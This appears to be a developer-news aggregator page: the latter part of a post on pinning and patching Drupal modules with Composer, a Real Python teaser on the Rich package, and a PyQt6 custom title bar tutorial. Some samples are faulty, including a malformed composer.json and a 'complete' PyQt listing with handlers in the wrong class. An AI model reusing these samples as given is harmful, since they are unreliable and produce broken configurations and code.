{ "name": "vendor/project", "repositories": [ { "type": "package", "package": { "keywords": [ "Drupal", "Context", "Active trail", "Breadcrumbs" ], "homepage": "https://www.drupal.org/project/context_active_trail", "version": "dev-2.x", "version_normalized": "dev-2.x", "license": "GPL-2.0+", "authors": [ { "name": "Jigar Mehta (jigarius)", "homepage": "https://jigarius.com/", "role": "Maintainer" }, { "name": "jigarius", "homepage": "https://www.drupal.org/user/2492730" }, { "name": "vasi", "homepage": "https://www.drupal.org/user/390545" } ], "support": { "source": "https://git.drupalcode.org/project/context_active_trail", "issues": "https://www.drupal.org/project/issues/context_active_trail" }, "source": { "type": "git", "url": "https://git.drupalcode.org/project/context_active_trail.git", "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e" }, "type": "drupal-module", "uid": "context_active_trail-3192784", "name": "drupal/context_active_trail", "extra": { "branch-alias": { "dev-2.x": "2.x-dev" }, "drupal": { "version": "8.x-2.0-rc2+1-dev", "datestamp": "1630867980", "security-coverage": { "status": "not-covered", "message": "Project has not opted into security advisory coverage!" } } }, "description": "Set the active trail based on context.", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } } }, { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "2.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, }, "patches": { "drupal/context_active_trail": { "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } }The pros:
- Uses more core Composer functionality
- A PHP developer will better understand what’s going on here
- You are in complete control of how this module package and version are defined
- All the work is in one file
The cons:
- Requires some understanding of how composer.json, packagists, and the magic of Drupal’s packagist all work
- That’s a messy composer.json for the project
- If you have to use exclude, you have to leave it up to outside forces to let you know when that module does finally put out and actual D10-ready version, and then undo all of this work
Standard PHP composer best practice says that if you make modifications to a package, fork it, maintain your modifications, and provide a pull request if it’s functionality you wish to contribute back. You can use this same approach with Drupal modules as well. Some may even say that’s what issue forks are for! That said, issue forks come with the downside that sometimes they go away, or are overridden with changes you don’t want. They are a moving dot.
For the sake of this example, let’s assume that we have forked the module on GitHub to https://github.com/fourkitchens/context_active_trail.git. If you don’t know how to make a fork, simply do the following:
- Clone the module to your local computer using the git instructions for the module in question
- Check out the branch you want to base your changes on
- Create a new repository on GitHub
- Add it as a remote git remote add github git@github.com:fourkitchens/context_active_trail.git
- Push it! git push github 8.x-2.x
You can do this with a version of the module that is in a merge request in Drupal.org’s issue queue, too. That way you won’t have to reapply all the changes. However, if your changes are in a patch file, consider adding them to the module at this time using your favorite patching method. Push all your changes to the github remote.
If the patch files don’t have changes to composer.json, or if the module doesn’t have one, you will likely want to provide at least a bare-bones one that contains something like the following and commit it:
{ "name": "drupal/context_active_trail", "type": "drupal-module", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } }This will tell Composer what it needs to know inside the project about dependencies. This project already had a composer.json, so I needed to add the changes from the patch to it.
Inside our Drupal project we are working on, we need to add a new entry to the repositories section. It will look something like this:
{ "type": "vcs", "url": "https://github.com/fourkitchens/context_active_trail.git" },The VCS type repository entry tells Composer to look at the repository and poll for all its branches and tags. These will be your new version numbers.
Much like in the “Custom Package” example, you may need to add an exclude property to the Drupal packagist entry.
… { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] }, …Now, since Drupal packagist isn’t here to give Composer some version aliases, we have to use the old notation dev-BRANCHNAME for our version. Our require entry will look something like this:
"drupal/context_active_trail": "dev-8.x-2.x",Since we already added our patches as a commit to the module, this is all you need. Your final composer.json for your project would look like this:
{ "name": "vendor/project", "repositories": [ { "type": "vcs", "url": "https://github.com/fourkitchens/context_active_trail.git" }, { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "dev-8.x-2.x", } }It makes for a much cleaner project json, but now you’ve split the work into two locations, requiring some synchronization. However, if multiple sites of yours use this same module and need the same fixes, this absolutely has the least resistance and ability to get those changes out more quickly.
The pros:
- Reusability
- Two smaller, simpler chunks of work
- Any PHP developer should be able to debug this setup as it uses Composer best practices. This method will be used in any project with any framework in the PHP ecosystem.
The cons:
- Changes are in two separate places
- Which patches are applied isn’t obvious in the composer.json and require looking through the commit history on the forked repository
- Requires maintenance and synchronization when upgrades happen
As with almost everything out there, there are multiple ways to achieve the same goal. I hope this brings awareness, and helps provide the flexibility you need when upgrading Drupal to a new major version. Obviously, each solution has strengths, and you may need to mix it up to get the results you want.
The post Using Composer for modules not ready for the next major version of Drupal appeared first on Four Kitchens.
Real Python: The Python Rich Package: Unleash the Power of Console Text
Python’s Rich package is a tool kit that helps you generate beautifully formatted and highlighted text in the console. More broadly, it allows you to build an attractive text-based user interface (TUI).
Why would you choose a TUI over a graphical user interface, or GUI? Sometimes a text display feels more appropriate. Why use a full-blown GUI for a simple application, when an elegant text interface will do? It can be refreshing to work with plain text. Text works in almost any hardware environment, even on an SSH terminal or a single-board computer display. And many applications don’t need the complexity of a full graphical windowing system.
In this tutorial, you’ll learn how Rich can help you:
- Enhance the user interface of command-line tools
- Improve the readability of console output
- Create attractive dashboard displays for real-time tabular data
- Generate well-formatted reports
Will McGugan, the author of Rich, has also developed the Textual package. Whereas Rich is a rich-text tool kit, Textual is a full application framework built on Rich. It provides application base classes, an event-driven architecture, and more.
There’s a lot you can do with Rich on its own, and its support for engaging, dynamic displays may well be sufficient for your app. By following this tutorial, you’ll experiment with many of the cool features of Rich, and you’ll finish up by using your skills to build a dynamically scrolling tabular display of crypto prices:
To fully understand Rich’s syntax for animations, you should have a good grasp of context managers. But if you’re a bit rusty, don’t worry! You’ll get a quick refresher in this tutorial.
Get Your Code: Click here to download free sample code that shows you how to use Rich for more beautiful Python code and apps.
Installing RichYou can start using Rich very quickly. As always when starting a new project or investigation, it’s best to create a virtual environment first, to avoid polluting your system’s Python installation.
It’s quite possible to install Rich and use it with the built-in Python REPL, but for a better developer experience, you may want to include support for Jupyter notebooks. Here’s how you can install Rich so that it’ll work with either the REPL or Jupyter:
Windows PowerShell PS> python -m venv venv PS> venv\Scripts\activate (venv) PS> python -m pip install rich[jupyter] Copied! Shell $ python -m venv venv $ source venv/bin/activate (venv) $ python -m pip install "rich[jupyter]" Copied!Now that you’ve installed Rich in your new virtual environment, you can test it and also get a nice overview of its capabilities:
Shell (venv) $ python -m rich Copied!Running this command will make lots of magic happen. Your terminal will fill with color, and you’ll see several options for customizing your text-based user interface:
Apart from displaying colorful text in a variety of styles, this demo also illustrates a few more of Rich’s exciting features.
You can wrap and justify text. You can easily display any Unicode characters, as well as a wide choice of emojis. Rich renders Markdown and offers a syntax for creating elegantly formatted tables.
There’s much more that you can do with Rich, as you’ll discover throughout this tutorial. You can also try some of the command-line demos that Rich has thoughtfully provided for its subpackages, so you can get a flavor of what each one can do without writing any code.
Here are a few that you can try from your OS console. Execute them one by one to get a feel for the power of Rich:
Shell (venv) $ python -m rich.table (venv) $ python -m rich.progress (venv) $ python -m rich.status Copied!Most of these demos are very short, but if necessary, you can always interrupt them with Ctrl+C.
With the installation done, you’re ready to start exploring Rich.
Read the full article at https://realpython.com/python-rich-package/ »[ Improve Your Python With 🐍 Python Tricks 💌 – Get a short & sweet Python Trick delivered to your inbox every couple of days. >> Click here to learn more and see examples ]
Python GUIs: How to Create a Custom Title Bar for a PyQt Window — Customize Your Python App's Title Bars
PyQt provides plenty of tools for creating unique and visually appealing graphical user interfaces (GUIs). One aspect of your applications that you may not have considered customizing is the title bar. The title bar is the topmost part of the window, where your users find the app's name, window controls & other elements.
This part of the window is usually drawn by the operating system or desktop environment and it's default look & feel may not gel well with the rest of your application. However, you may want to customize it to add additional functionality. For example, in web browsers the document tabs are now typically collapsed into the title bar to maximize available space for viewing pages.
In this tutorial, you will learn how to create custom title bars in PyQt. By the end of this tutorial, you will have the necessary knowledge to enhance your PyQt applications with personalized and (hopefully!) stylish title bars.
Table of Contents- Creating Frameless Windows in PyQt
- Setting Up the Main Window
- Creating a Custom Title Bar for a PyQt Window
- Updating the Window's State
- Handling Window's Moves
- Making it a little more beautiful
- Conclusion
The first step to providing a PyQt application with a custom title bar is to remove the default title bar and window decoration provided by the operating system. If we don't take this step, we'll end up with multiple title bars at the top of our windows.
In PyQt, we can create a frameless window using the setWindowFlags() method available on all QWidget subclasses, including QMainWindow. We call this method, passing in the FramelessWindowHint flag, which lives in the Qt namespace under the WindowType enumeration.
Here's the code of a minimal PyQt app whose main window is frameless:
python from PyQt6.QtCore import Qt from PyQt6.QtWidgets import QApplication, QMainWindow class MainWindow(QMainWindow): def __init__(self): super().__init__() self.setWindowTitle("Custom Title Bar") self.resize(400, 200) self.setWindowFlags(Qt.WindowType.FramelessWindowHint) if __name__ == "__main__": app = QApplication([]) window = MainWindow() window.show() app.exec()After importing the required classes, we create a window by subclassing QMainWindow. In the class initializer method, we set the window's title and resize the window using the resize() method. Then we use the setWindowFlags() to make the window frameless. The rest is the usual boilerplate code for creating PyQt applications.
If you run this app from your command line, you'll get the following window on your screen:
A frameless window in PyQt
As you can see, the app's main window doesn't have a title bar or any other decoration. It's only a gray rectangle on your screen.
Because the window has no buttons, you need to press Alt-F4 on Windows and Linux or Cmd+Q on macOS to close the app.
This isn't very helpful, of course, but we'll be adding back in our custom title bar shortly.
Setting Up the Main WindowBefore creating our custom title bar, we'll finish the initialization of our app's main window, import some additional classes and create the window's central widget and layouts.
Here's the code update:
python from PyQt6.QtCore import Qt from PyQt6.QtWidgets import ( QApplication, QLabel, QMainWindow, QVBoxLayout, QWidget, ) class MainWindow(QMainWindow): def __init__(self): super().__init__() self.setWindowTitle("Custom Title Bar") self.resize(400, 200) self.setWindowFlags(Qt.WindowType.FramelessWindowHint) central_widget = QWidget() self.title_bar = CustomTitleBar(self) work_space_layout = QVBoxLayout() work_space_layout.setContentsMargins(11, 11, 11, 11) work_space_layout.addWidget(QLabel("Hello, World!", self)) centra_widget_layout = QVBoxLayout() centra_widget_layout.setContentsMargins(0, 0, 0, 0) centra_widget_layout.setAlignment(Qt.AlignmentFlag.AlignTop) centra_widget_layout.addWidget(self.title_bar) centra_widget_layout.addLayout(work_space_layout) central_widget.setLayout(centra_widget_layout) self.setCentralWidget(central_widget) # ...First, we import the QLabel, QVBoxLayout, and QWidget classes. In our window's initializer, we create a central widget by instantiating QWidget(). Next, we create an instance attribute called title_bar by instantiating a class called CustomTitleBar. We still need to implement this class -- we'll do this in a moment.
The next step is to create a layout for our window's workspace. In this example, we're using a QVBoxLayout, but you can use the layout that better fits your needs. We also set some margins for the layout content and added a label containing the phrase "Hello, World!".
Next, we create a global layout for our central widget. Again, we use a QVBoxLayout. We set the layout's margins to 0 and aligned it on the top of our frameless window. In this layout, we need to add the title bar at the top and the workspace at the bottom. Finally, we set the central widget's layout and the app's central widget.
That's it! We have all the boilerplate code we need for our window to work correctly. Now we're ready to write our custom title bar.
Creating a Custom Title Bar for a PyQt WindowIn this section, we will create a custom title bar for our main window. To do this, we will create a new class by inheriting from QWidget. First, go ahead and update your imports like in the code below:
python from PyQt6.QtCore import QSize, Qt from PyQt6.QtGui import QPalette from PyQt6.QtWidgets import ( QApplication, QHBoxLayout, QLabel, QMainWindow, QStyle, QToolButton, QVBoxLayout, QWidget, ) # ...Here, we've imported a few new classes. We will use these classes as building blocks for our title bar. Without further ado, let's get into the title bar code. We'll introduce the code in small consecutive chunks to facilitate the explanation. Here's the first piece:
python # ... class CustomTitleBar(QWidget): def __init__(self, parent): super().__init__(parent) self.setAutoFillBackground(True) self.setBackgroundRole(QPalette.ColorRole.Highlight) self.initial_pos = None title_bar_layout = QHBoxLayout(self) title_bar_layout.setContentsMargins(1, 1, 1, 1) title_bar_layout.setSpacing(2)In this code snippet, we create a new class by inheriting from QWidget. This way, our title bar will have all the standard features and functionalities of any PyQt widgets. In the class initializer, we set autoFillBackground to true because we want to give a custom color to the bar. The next line of code sets the title bar's background color to QPalette.ColorRole.Highlight, which is a blueish color.
The next line of code creates and initializes an instance attribute called initial_pos. We'll use this attribute later on when we deal with moving the window around our screen.
The final three lines of code allow us to create a layout for our title bar. Because the title bar should be horizontally oriented, we use a QHBoxLayout class to structure it.
The piece of code below deals with our window's title:
python # ... class CustomTitleBar(QWidget): def __init__(self, parent): # ... self.title = QLabel(f"{self.__class__.__name__}", self) self.title.setStyleSheet( """font-weight: bold; border: 2px solid black; border-radius: 12px; margin: 2px; """ ) self.title.setAlignment(Qt.AlignmentFlag.AlignCenter) if title := parent.windowTitle(): self.title.setText(title) title_bar_layout.addWidget(self.title)The first line of new code creates a title attribute. It's a QLable object that will hold the window's title. Because we want to build a cool title bar, we'd like to add some custom styling to the title. To do this, we use the setStyleSheet() method with a string representing a CSS style sheet as an argument. The style sheet tweaks the font, borders, and margins of our title label.
Next, we center the title using the setAlignment() method with the Qt.AlignmentFlag.AlignCenter flag as an argument.
In the conditional statement, we check whether our window has a title. If that's the case, we set the text of our title label to the current window's title. Finally, we added the title label to the title bar layout.
The next step in our journey to build a custom title bar is to provide standard window controls. In other words, we need to add the minimize, maximize, close, and normal buttons. These buttons will allow our users to interact with our window. To create the buttons, we'll use the QToolButton class.
Here's the required code:
python # ... class CustomTitleBar(QWidget): def __init__(self, parent): # ... # Min button self.min_button = QToolButton(self) min_icon = self.style().standardIcon( QStyle.StandardPixmap.SP_TitleBarMinButton ) self.min_button.setIcon(min_icon) self.min_button.clicked.connect(self.window().showMinimized) # Max button self.max_button = QToolButton(self) max_icon = self.style().standardIcon( QStyle.StandardPixmap.SP_TitleBarMaxButton ) self.max_button.setIcon(max_icon) self.max_button.clicked.connect(self.window().showMaximized) # Close button self.close_button = QToolButton(self) close_icon = self.style().standardIcon( QStyle.StandardPixmap.SP_TitleBarCloseButton ) self.close_button.setIcon(close_icon) self.close_button.clicked.connect(self.window().close) # Normal button self.normal_button = QToolButton(self) normal_icon = self.style().standardIcon( QStyle.StandardPixmap.SP_TitleBarNormalButton ) self.normal_button.setIcon(normal_icon) self.normal_button.clicked.connect(self.window().showNormal) self.normal_button.setVisible(False)In this code snippet, we define all the required buttons by instantiating the QToolButton class. The minimize, maximize, and close buttons follow the same pattern. We create the button, define an icon for the buttons at hand, and set the icon using the setIcon() method.
Note that we use the standard icons that PyQt provides. For example, the minimize button uses the SP_TitleBarMinButton icon. Similarly, the maximize and close buttons use the SP_TitleBarMaxButton and SP_TitleBarCloseButton icons. We find all these icons in the QStyle.StandardPixmap namespace.
Finally, we connect the button's clicked() signal with the appropriate slot. For the minimize buttons, the proper slot is .showMinimized(). For the maximize and close buttons, the right slots are .showMaximized() and close(), respectively. All these slots are part of the main window's class.
The normal button at the end of the above code uses the SP_TitleBarNormalButton icon and showNormal() slot. This button has an extra setting. We've set its visibility to False, meaning that the button will be hidden by default. It'll only appear when we maximize the window to allow us to return to the normal state.
Now that we've created and tweaked the buttons, we must add them to our title bar. To do this, we can use the following for loop:
python # ... class CustomTitleBar(QWidget): def __init__(self, parent): # ... buttons = [ self.min_button, self.normal_button, self.max_button, self.close_button, ] for button in buttons: button.setFocusPolicy(Qt.FocusPolicy.NoFocus) button.setFixedSize(QSize(28, 28)) button.setStyleSheet( """QToolButton { border: 2px solid white; border-radius: 12px; } """ ) title_bar_layout.addWidget(button)This loop iterates over our four buttons in a predefined order. The first thing to do inside the loop is to define the focus policy of each button. We don't want these buttons to steal focus from buttons in the window's working space , therefore we set their focus policy to NoFocus.
Next, we set a fixed size of 28 by 28 pixels for the three buttons using the setFixedSize() method with a QSize object as an argument.
Our main goal in this section is to create a custom title bar. A handy way to customize the look and feel of PyQt widgets is to use CSS style sheets. In the above piece of code, we use the setStyleSheet() method to apply a custom CSS style sheet to our four buttons. The sheet defines a white and round border for each button.
The final line in the above code calls the addWidget() method to add each custom button to our title bar's layout. That's it! We're now ready to give our title bar a try. Go ahead and run the application from your command line. You'll see a window like the following:
A PyQt window with a custom title bar
This is pretty simple styling, but you get the idea. You can tweak the title bar further, depending on your needs. For example, you can change the colors and borders, customize the title's font, add other widgets to the bar, and more.
We'll apply some nicer styles later, once we have the functionality in place! Keep reading.
Even though the title bar looks different, it has limited functionality. For example, if you click the maximize button, then the window will change to its maximized state. However, the normal button won't show up to allow you to return the window to its previous state.
In addition to this, if you try to move the window around your screen, you'll quickly notice a problem: it's impossible to move the window!
In the following sections, we'll write the necessary code to fix these issues and make our custom title bar fully functional. To kick things off, let's start by fixing the state issues.
Updating the Window's StateTo fix the issue related to the window's state, we'll write two new methods. We need to override one method and write another. In the MainWindow class, we'll override the changeEvent() method. The changeEvent() method is called directly by Qt whenever the window state changes: for example if the window is maximized or hidden. By overriding this event we can add our own custom behavior.
Here's the code that overrides the changeEvent() method:
python from PyQt6.QtCore import QSize, Qt, QEvent # ... class MainWindow(QMainWindow): # ... def changeEvent(self, event): if event.type() == QEvent.Type.WindowStateChange: self.title_bar.window_state_changed(self.windowState()) super().changeEvent(event) event.accept()This method is fairly straightforward. We check the event type to see if it is a WindowStateChange. If that's the case, we call the window_state_changed() method of our custom title bar, passing the current window's state as an argument. In the final two lines, we call the parent class's changeEvent() method and accept the event to signal that we've correctly processed it.
Here's the implementation of our window_state_changed() method:
python # ... class CustomTitleBar(QWidget): # ... def window_state_changed(self, state): if state == Qt.WindowState.WindowMaximized: self.normal_button.setVisible(True) self.max_button.setVisible(False) else: self.normal_button.setVisible(False) self.max_button.setVisible(True)This method takes a window's state as an argument. Depending on the value of the state parameter we will optionally show and hide the maximize & restore buttons.
First, if the window is currently maximized we will show the normal button and hide the maximize button. Alternatively, if the window is currently not maximized we will hide the normal button and show the maximize button.
The effect of this, together with the order we added the buttons above, is that when you maximize the window the maximize button will appear to be replaced with the normal button. When you restore the window to it's normal size, the normal button will be replaced with the maximize button.
Go ahead and run the app again. Click the maximize button. You'll note that when the window gets maximized, the middle button changes its icon. Now you have access to the normal button. If you click it, then the window will recover its previous state.
Handling Window's MovesNow it's time to write the code that enables us to move the window around the screen while holding your mouse's left-click button on the title bar. To fix this issue, we only need to add code to the CustomTitleBar class.
In particular, we need to override three mouse events:
- mousePressEvent() will let us know when the user clicks on our custom title bar using the mouse's left-click button. This may indicate that the window movement should start.
- mouseMoveEvent() will let us process the window movements.
- mouseReleaseEvent() will let us know when the user has released the mouse's left-click button so that we can stop moving the window.
Here's the code that overrides the mousePressEvent() method:
python # ... class CustomTitleBar(QWidget): # ... def mousePressEvent(self, event): if event.button() == Qt.MouseButton.LeftButton: self.initial_pos = event.position().toPoint() super().mousePressEvent(event) event.accept()In this method, we first check if the user clicks on the title bar using the mouse's left-click button. If that's the case, then we update our initial_pos attribute to the clicked point. Remember that we defined initial_pos and initialized it to None back in the __init__() method of CustomTitleBar.
Next, we need to override the mousePressEvent() method. Here's the required code:
python # ... class CustomTitleBar(QWidget): # ... def mouseMoveEvent(self, event): if self.initial_pos is not None: delta = event.position().toPoint() - self.initial_pos self.window().move( self.window().x() + delta.x(), self.window().y() + delta.y(), ) super().mouseMoveEvent(event) event.accept()This if statement in mouseMoveEvent() checks if the initial_pos attribute is not None. If this condition is true, then the if code block executes because we have a valid initial position.
The first line in the if code block calculates the difference, ordelta, between the current and initial mouse positions. To get the current position, we call the position() method on the event object and convert that position into a QPoint object using the toPoint() method.
The following four lines update the position of our application's main window by adding the delta values to the current window position. The move() method does the hard work of moving the window.
In summary, this code updates the window position based on the movement of our mouse. It tracks the initial position of the mouse, calculates the difference between the initial position and the current position, and applies that difference to the window's position.
Finally, we can complete the mouseReleaseEvent() method:
python # ... class CustomTitleBar(QWidget): # ... def mouseReleaseEvent(self, event): self.initial_pos = None super().mouseReleaseEvent(event) event.accept()This method's implementation is pretty straightforward. Its purpose is to reset the initial position by setting it back to None when the mouse is released, indicating that the drag is complete.
That's it! Go ahead and run your app again. Click on your custom title bar and move the window around while holding the mouse's left-click button. Can you move the window? Great! Your custom title bar is now fully functional.
The completed code for the custom title bar is shown below.
python from PyQt6.QtCore import QSize, Qt, QEvent from PyQt6.QtGui import QPalette from PyQt6.QtWidgets import ( QApplication, QHBoxLayout, QLabel, QMainWindow, QStyle, QToolButton, QVBoxLayout, QWidget, ) class CustomTitleBar(QWidget): def __init__(self, parent): super().__init__(parent) self.setAutoFillBackground(True) self.setBackgroundRole(QPalette.ColorRole.Highlight) self.initial_pos = None title_bar_layout = QHBoxLayout(self) title_bar_layout.setContentsMargins(1, 1, 1, 1) title_bar_layout.setSpacing(2) self.title = QLabel(f"{self.__class__.__name__}", self) self.title.setStyleSheet( """font-weight: bold; border: 2px solid black; border-radius: 12px; margin: 2px; """ ) self.title.setAlignment(Qt.AlignmentFlag.AlignCenter) if title := parent.windowTitle(): self.title.setText(title) title_bar_layout.addWidget(self.title) # Min button self.min_button = QToolButton(self) min_icon = self.style().standardIcon( QStyle.StandardPixmap.SP_TitleBarMinButton ) self.min_button.setIcon(min_icon) self.min_button.clicked.connect(self.window().showMinimized) # Max button self.max_button = QToolButton(self) max_icon = self.style().standardIcon( QStyle.StandardPixmap.SP_TitleBarMaxButton ) self.max_button.setIcon(max_icon) self.max_button.clicked.connect(self.window().showMaximized) # Close button self.close_button = QToolButton(self) close_icon = self.style().standardIcon( QStyle.StandardPixmap.SP_TitleBarCloseButton ) self.close_button.setIcon(close_icon) self.close_button.clicked.connect(self.window().close) # Normal button self.normal_button = QToolButton(self) normal_icon = self.style().standardIcon( QStyle.StandardPixmap.SP_TitleBarNormalButton ) self.normal_button.setIcon(normal_icon) self.normal_button.clicked.connect(self.window().showNormal) self.normal_button.setVisible(False) # Add buttons buttons = [ self.min_button, self.normal_button, self.max_button, self.close_button, ] for button in buttons: button.setFocusPolicy(Qt.FocusPolicy.NoFocus) button.setFixedSize(QSize(28, 28)) button.setStyleSheet( """QToolButton { border: 2px solid white; border-radius: 12px; } """ ) title_bar_layout.addWidget(button) def window_state_changed(self, state): if state == Qt.WindowState.WindowMaximized: self.normal_button.setVisible(True) self.max_button.setVisible(False) else: self.normal_button.setVisible(False) self.max_button.setVisible(True) class MainWindow(QMainWindow): def __init__(self): super().__init__() self.setWindowTitle("Custom Title Bar") self.resize(400, 200) self.setWindowFlags(Qt.WindowType.FramelessWindowHint) central_widget = QWidget() self.title_bar = CustomTitleBar(self) work_space_layout = QVBoxLayout() work_space_layout.setContentsMargins(11, 11, 11, 11) work_space_layout.addWidget(QLabel("Hello, World!", self)) centra_widget_layout = QVBoxLayout() centra_widget_layout.setContentsMargins(0, 0, 0, 0) centra_widget_layout.setAlignment(Qt.AlignmentFlag.AlignTop) centra_widget_layout.addWidget(self.title_bar) centra_widget_layout.addLayout(work_space_layout) central_widget.setLayout(centra_widget_layout) self.setCentralWidget(central_widget) def changeEvent(self, event): if event.type() == QEvent.Type.WindowStateChange: self.title_bar.window_state_changed(self.windowState()) super().changeEvent(event) event.accept() def window_state_changed(self, state): self.normal_button.setVisible(state == Qt.WindowState.WindowMaximized) self.max_button.setVisible(state != Qt.WindowState.WindowMaximized) def mousePressEvent(self, event): if event.button() == Qt.MouseButton.LeftButton: self.initial_pos = event.position().toPoint() super().mousePressEvent(event) event.accept() def mouseMoveEvent(self, event): if self.initial_pos is not None: delta = event.position().toPoint() - self.initial_pos self.window().move( self.window().x() + delta.x(), self.window().y() + delta.y(), ) super().mouseMoveEvent(event) event.accept() def mouseReleaseEvent(self, event): self.initial_pos = None super().mouseReleaseEvent(event) event.accept() if __name__ == "__main__": app = QApplication([]) window = MainWindow() window.show() app.exec() Making it a little more beautifulSo far we've covered the technical aspects of styling our window with a custom title bar, and added the code to make it function as expected. But it doesn't look great. In this section we'll take our existing code & tweak the styling and buttons to produce something that's a little more professional looking.
One common reason for wanting to apply custom title bars to a window is to integrate the title bar with the rest of the application. This technique is called a unified title bar and can be seen in some popular applications such as web browsers, or Spotify.
In this section we'll look at how we can reproduce the same effect in PyQt using a combination of stylesheets & icons. Below is a screenshot of the final result which we'll be building.
As you can see the window & the toolbar blend nicely together and the window has rounded corners. There are a few different ways to do this, but we'll cover a simple approach using Qt stylesheets to apply styling over the entire window.
In order to customize the shape of the window, we need to first tell the OS to stop drawing the default window outline and background for us. We do that by setting a window attribute on the window. This is similar to the flags we already discussed, in that it turns on & off different window manager behaviors.
python # ... class MainWindow(QMainWindow): def __init__(self): super().__init__() self.setWindowTitle("Custom Title Bar") self.resize(400, 200) self.setWindowFlags(Qt.WindowType.FramelessWindowHint) self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground) # ...We've added a call to self.setAttribute which sets the attribute Qt.WidgetAttribute.WA_TranslucentBackground on the window. If you run the code now you will see the window has become transparent, with only the widget text & toolbar visible.
Next we'll tell Qt to draw a new custom background for us. If you've worked with QSS before, the most obvious way to apply curved edges to the window using QSS stylesheets would be to set border-radius: styles on the main window directly, e.g.
python #... class MainWindow(QMainWindow): def __init__(self): super().__init__() # ... self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground) self.setStyleSheet("background-color: gray; border-radius: 10px;") #...However, if you try this you'll notice that it doesn't work. If you enable a translucent background, the background of the window is not drawn (including your styles). If you don't set translucent background, the window is filled to the edges with a solid color ignoring the border radius.
.
The good news is that, with a bit of lateral thinking, there is a simple solution. We already know that we can construct interfaces by nesting widgets in layouts. Since we can't style the border-radius of a window, but we can style any other widget, the solution is to simply add a container widget into our window & apply the curved-edge and background styles to that.
On our MainWindow object we already have a central widget which contains our layout, so we can apply the styles there.
python class MainWindow(QMainWindow): def __init__(self): super().__init__() # ... central_widget = QWidget() # This container holds the window contents, so we can style it. central_widget.setObjectName("Container") central_widget.setStyleSheet("""#Container { background: qlineargradient(x1:0 y1:0, x2:1 y2:1, stop:0 #051c2a stop:1 #44315f); border-radius: 5px; }""") self.title_bar = CustomTitleBar(self) # ...We've taken the existing central_widget object and assigned an object name to it. This is a ID which we can use to refer to the widget from QSS, to apply our styles specifically to that widget.
If you're familiar with CSS you might expect that IDs like #Container must be unique. However, they are not: you can give multiple widgets the same object name if you like. So you can re-use this technique and QSS on multiple windows in your application without problems.
With this style applied on our window, we have a nice gradient background with curved corners.
Unfortunately, the title bar we created is drawn filled, and so the background and curved corners of our window are over-written. To make things look coherent we need to make our title bar also transparent by removing the background color & auto-fill behavior we set earlier.
We don't need to set any flags or attributes this widget because it is not a window. A QWidget object is transparent by default.
We can also make some tweaks to the style of the title label, such as adjusting the font size and making the title capitalized using text-transform: uppercase -- feel free to customize this yourself.
python class CustomTitleBar(QWidget): def __init__(self, parent): super().__init__(parent) # self.setAutoFillBackground(True) # <-- remove # self.setBackgroundRole(QPalette.ColorRole.Highlight) # <-- remove self.initial_pos = None title_bar_layout = QHBoxLayout(self) title_bar_layout.setContentsMargins(1, 1, 1, 1) title_bar_layout.setSpacing(2) self.title = QLabel(f"{self.__class__.__name__}", self) self.title.setAlignment(Qt.AlignmentFlag.AlignCenter) self.title.setStyleSheet(""" QLabel { text-transform: uppercase; font-size: 10pt; margin-left: 48px; } """)QSS is very similar to CSS, especially for text styling.
The margin-left: 48px is to compensate for the 3 * 16px window icons on the right hand side so the text align centrally.
The icons are currently using built-in Qt icons which are a little bit plain & ugly. Next let's update the icons, using custom SVG icons of simple colored circles, for the minimize, maximize, close & restore buttons.
python from PyQt6.QtGui import QIcon # ... class CustomTitleBar(QWidget): def __init__(self, parent): super().__init__(parent) # ... # Min button self.min_button = QToolButton(self) min_icon = QIcon() min_icon.addFile('min.svg') self.min_button.setIcon(min_icon) self.min_button.clicked.connect(self.window().showMinimized) # Max button self.max_button = QToolButton(self) max_icon = QIcon() max_icon.addFile('max.svg') self.max_button.setIcon(max_icon) self.max_button.clicked.connect(self.window().showMaximized) # Close button self.close_button = QToolButton(self) close_icon = QIcon() close_icon.addFile('close.svg') # Close has only a single state. self.close_button.setIcon(close_icon) self.close_button.clicked.connect(self.window().close) # Normal button self.normal_button = QToolButton(self) normal_icon = QIcon() normal_icon.addFile('normal.svg') self.normal_button.setIcon(normal_icon) self.normal_button.clicked.connect(self.window().showNormal) self.normal_button.setVisible(False) # ...This code follows the same basic structure as before, but instead of using the built-in icons here we're loading our icons from SVG images. These images are very simple, consisting of a single circle in green, red or yellow for the different states mimicking macOS.
The normal.svg file for returning a maximized window to normal size shows a semi-transparent green circle for simplicity's sake, but you can include iconography and hover behaviors on the buttons if you prefer.
You can download these icons & all source code for this tutorial here: https://downloads.pythonguis.com/custom-title-bar-pyqt6.zip
The final step is to iterate through the created buttons, adding them to title bar layout. This is slightly tweaked from before to remove the border styling replacing it with simple padding & setting the icon sizes to 16px. Because we are using SVG files the icons will automatically scale to the available space.
python class CustomTitleBar(QWidget): def __init__(self, parent): super().__init__(parent) # ... for button in buttons: button.setFocusPolicy(Qt.FocusPolicy.NoFocus) button.setFixedSize(QSize(16, 16)) button.setStyleSheet( """QToolButton { border: none; padding: 2px; } """ ) title_bar_layout.addWidget(button)And that's it! With these changes, you can now run your application and you'll see a nice sleek modern-looking UI with unified title bar and custom controls.
The final result, showing our unified title bar and window design.
The complete code is shown below:
